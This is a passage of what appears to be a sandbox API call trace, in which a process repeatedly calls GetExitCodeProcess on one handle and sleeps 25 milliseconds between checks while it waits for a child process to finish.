lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0248.110] Sleep (dwMilliseconds=0x19) [0248.144] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0248.144] Sleep (dwMilliseconds=0x19) [0248.214] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0248.214] Sleep (dwMilliseconds=0x19) [0248.334] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0248.335] Sleep (dwMilliseconds=0x19) [0248.520] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0248.520] Sleep (dwMilliseconds=0x19) [0248.558] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0248.558] Sleep (dwMilliseconds=0x19) [0248.594] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0248.594] Sleep (dwMilliseconds=0x19) [0248.628] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0248.628] Sleep (dwMilliseconds=0x19) [0248.679] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0248.679] Sleep (dwMilliseconds=0x19) [0248.713] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0248.714] Sleep (dwMilliseconds=0x19) [0248.749] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0248.749] Sleep (dwMilliseconds=0x19) [0248.823] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0248.823] Sleep (dwMilliseconds=0x19) [0248.927] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0248.927] Sleep (dwMilliseconds=0x19) [0248.997] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0248.997] Sleep (dwMilliseconds=0x19) [0249.035] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.036] Sleep (dwMilliseconds=0x19) [0249.078] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.078] Sleep (dwMilliseconds=0x19) [0249.150] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.150] Sleep (dwMilliseconds=0x19) [0249.201] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.201] Sleep (dwMilliseconds=0x19) [0249.236] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.236] Sleep (dwMilliseconds=0x19) [0249.272] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.272] Sleep (dwMilliseconds=0x19) [0249.353] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.353] Sleep (dwMilliseconds=0x19) [0249.431] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.431] Sleep (dwMilliseconds=0x19) [0249.501] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.501] Sleep (dwMilliseconds=0x19) [0249.545] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.545] Sleep (dwMilliseconds=0x19) [0249.572] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.572] Sleep (dwMilliseconds=0x19) [0249.600] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.600] Sleep (dwMilliseconds=0x19) [0249.635] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.635] Sleep (dwMilliseconds=0x19) [0249.727] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.727] Sleep (dwMilliseconds=0x19) [0249.807] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.807] Sleep (dwMilliseconds=0x19) [0249.856] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.856] Sleep (dwMilliseconds=0x19) [0249.894] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.894] Sleep (dwMilliseconds=0x19) [0249.922] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.922] Sleep (dwMilliseconds=0x19) [0249.948] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.948] Sleep (dwMilliseconds=0x19) [0249.981] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0249.981] Sleep (dwMilliseconds=0x19) [0250.007] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0250.007] Sleep (dwMilliseconds=0x19) [0250.035] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0250.035] Sleep (dwMilliseconds=0x19) [0250.068] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0250.068] Sleep (dwMilliseconds=0x19) [0250.286] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0250.286] Sleep (dwMilliseconds=0x19) [0250.441] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0250.441] Sleep (dwMilliseconds=0x19) [0250.493] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0250.493] Sleep (dwMilliseconds=0x19) [0250.528] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0250.528] Sleep (dwMilliseconds=0x19) [0250.568] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0250.568] Sleep (dwMilliseconds=0x19) [0250.602] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0250.602] Sleep (dwMilliseconds=0x19) [0250.652] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0250.652] Sleep (dwMilliseconds=0x19) [0250.686] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0250.686] Sleep (dwMilliseconds=0x19) [0250.721] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0250.721] Sleep (dwMilliseconds=0x19) [0250.801] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0250.801] Sleep (dwMilliseconds=0x19) [0250.874] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0250.874] Sleep (dwMilliseconds=0x19) [0250.944] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0250.944] Sleep (dwMilliseconds=0x19) [0250.992] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0250.992] Sleep (dwMilliseconds=0x19) [0251.034] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.034] Sleep (dwMilliseconds=0x19) [0251.076] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.076] Sleep (dwMilliseconds=0x19) [0251.166] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.166] Sleep (dwMilliseconds=0x19) [0251.256] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.256] Sleep (dwMilliseconds=0x19) [0251.294] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.294] Sleep (dwMilliseconds=0x19) [0251.435] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.435] Sleep (dwMilliseconds=0x19) [0251.478] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.478] Sleep (dwMilliseconds=0x19) [0251.513] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.513] Sleep (dwMilliseconds=0x19) [0251.549] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.549] Sleep (dwMilliseconds=0x19) [0251.583] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.583] Sleep (dwMilliseconds=0x19) [0251.657] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.657] Sleep (dwMilliseconds=0x19) [0251.702] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.702] Sleep (dwMilliseconds=0x19) [0251.738] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.738] Sleep (dwMilliseconds=0x19) [0251.784] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.784] Sleep (dwMilliseconds=0x19) [0251.823] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.824] Sleep (dwMilliseconds=0x19) [0251.912] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.912] Sleep (dwMilliseconds=0x19) [0251.947] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0251.948] Sleep (dwMilliseconds=0x19) [0252.010] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.010] Sleep (dwMilliseconds=0x19) [0252.045] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.045] Sleep (dwMilliseconds=0x19) [0252.089] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.089] Sleep (dwMilliseconds=0x19) [0252.124] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.124] Sleep (dwMilliseconds=0x19) [0252.159] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.159] Sleep (dwMilliseconds=0x19) [0252.237] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.237] Sleep (dwMilliseconds=0x19) [0252.271] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.271] Sleep (dwMilliseconds=0x19) [0252.321] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.321] Sleep (dwMilliseconds=0x19) [0252.479] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.479] Sleep (dwMilliseconds=0x19) [0252.549] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.549] Sleep (dwMilliseconds=0x19) [0252.595] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.595] Sleep (dwMilliseconds=0x19) [0252.632] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.632] Sleep (dwMilliseconds=0x19) [0252.716] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.717] Sleep (dwMilliseconds=0x19) [0252.793] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.793] Sleep (dwMilliseconds=0x19) [0252.828] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.828] Sleep (dwMilliseconds=0x19) [0252.873] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.873] Sleep (dwMilliseconds=0x19) [0252.909] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.909] Sleep (dwMilliseconds=0x19) [0252.945] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.945] Sleep (dwMilliseconds=0x19) [0252.997] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0252.997] Sleep (dwMilliseconds=0x19) [0253.031] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0253.032] Sleep (dwMilliseconds=0x19) [0253.069] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0253.069] Sleep (dwMilliseconds=0x19) [0253.103] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0253.103] Sleep (dwMilliseconds=0x19) [0253.139] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0253.139] Sleep (dwMilliseconds=0x19) [0253.174] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0253.174] Sleep (dwMilliseconds=0x19) [0253.230] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0253.230] Sleep (dwMilliseconds=0x19) [0253.299] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0253.299] Sleep (dwMilliseconds=0x19) [0253.333] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0253.334] Sleep (dwMilliseconds=0x19) [0253.368] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0253.368] Sleep (dwMilliseconds=0x19) [0253.472] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0253.473] Sleep (dwMilliseconds=0x19) [0253.507] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0253.507] Sleep (dwMilliseconds=0x19) [0253.576] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0253.576] Sleep (dwMilliseconds=0x19) [0253.737] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0253.738] Sleep (dwMilliseconds=0x19) [0253.809] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0253.809] Sleep (dwMilliseconds=0x19) [0253.930] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0253.930] Sleep (dwMilliseconds=0x19) [0254.006] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0254.006] Sleep (dwMilliseconds=0x19) [0254.044] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0254.044] Sleep (dwMilliseconds=0x19) [0254.080] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0254.080] Sleep (dwMilliseconds=0x19) [0254.118] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0254.118] Sleep (dwMilliseconds=0x19) [0254.160] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0254.160] Sleep (dwMilliseconds=0x19) [0254.210] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0254.210] Sleep (dwMilliseconds=0x19) [0254.291] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0254.291] Sleep (dwMilliseconds=0x19) [0254.369] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0254.369] Sleep (dwMilliseconds=0x19) [0254.492] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0254.492] Sleep (dwMilliseconds=0x19) [0254.577] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0254.577] Sleep (dwMilliseconds=0x19) [0254.676] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0254.676] Sleep (dwMilliseconds=0x19) [0254.731] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0254.731] Sleep (dwMilliseconds=0x19) [0254.788] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0254.789] Sleep (dwMilliseconds=0x19) [0254.866] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0254.866] Sleep (dwMilliseconds=0x19) [0255.107] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0255.107] Sleep (dwMilliseconds=0x19) [0255.145] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0255.145] Sleep (dwMilliseconds=0x19) [0255.179] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0255.179] Sleep (dwMilliseconds=0x19) [0255.225] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0255.225] Sleep (dwMilliseconds=0x19) [0255.257] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0255.257] Sleep (dwMilliseconds=0x19) [0255.302] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0255.302] Sleep (dwMilliseconds=0x19) [0255.335] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0255.335] Sleep (dwMilliseconds=0x19) [0255.375] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0255.375] Sleep (dwMilliseconds=0x19) [0255.464] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0255.464] Sleep (dwMilliseconds=0x19) [0255.521] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0255.521] Sleep (dwMilliseconds=0x19) [0255.581] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0255.581] Sleep (dwMilliseconds=0x19) [0255.788] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0255.788] Sleep (dwMilliseconds=0x19) [0255.866] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0255.866] Sleep (dwMilliseconds=0x19) [0255.954] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0255.954] Sleep (dwMilliseconds=0x19) [0256.050] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.050] Sleep (dwMilliseconds=0x19) [0256.132] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.132] Sleep (dwMilliseconds=0x19) [0256.169] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.170] Sleep (dwMilliseconds=0x19) [0256.205] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.205] Sleep (dwMilliseconds=0x19) [0256.257] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.257] Sleep (dwMilliseconds=0x19) [0256.296] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.297] Sleep (dwMilliseconds=0x19) [0256.338] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.338] Sleep (dwMilliseconds=0x19) [0256.469] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.469] Sleep (dwMilliseconds=0x19) [0256.563] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.563] Sleep (dwMilliseconds=0x19) [0256.598] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.598] Sleep (dwMilliseconds=0x19) [0256.632] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.632] Sleep (dwMilliseconds=0x19) [0256.710] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.710] Sleep (dwMilliseconds=0x19) [0256.752] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.752] Sleep (dwMilliseconds=0x19) [0256.787] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.788] Sleep (dwMilliseconds=0x19) [0256.823] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.823] Sleep (dwMilliseconds=0x19) [0256.866] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.866] Sleep (dwMilliseconds=0x19) [0256.902] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.902] Sleep (dwMilliseconds=0x19) [0256.940] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.941] Sleep (dwMilliseconds=0x19) [0256.977] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0256.977] Sleep (dwMilliseconds=0x19) [0257.018] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.018] Sleep (dwMilliseconds=0x19) [0257.073] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.073] Sleep (dwMilliseconds=0x19) [0257.115] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.115] Sleep (dwMilliseconds=0x19) [0257.151] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.151] Sleep (dwMilliseconds=0x19) [0257.230] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.230] Sleep (dwMilliseconds=0x19) [0257.339] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.339] Sleep (dwMilliseconds=0x19) [0257.373] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.373] Sleep (dwMilliseconds=0x19) [0257.446] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.446] Sleep (dwMilliseconds=0x19) [0257.479] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.480] Sleep (dwMilliseconds=0x19) [0257.522] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.522] Sleep (dwMilliseconds=0x19) [0257.559] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.559] Sleep (dwMilliseconds=0x19) [0257.594] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0257.594] Sleep 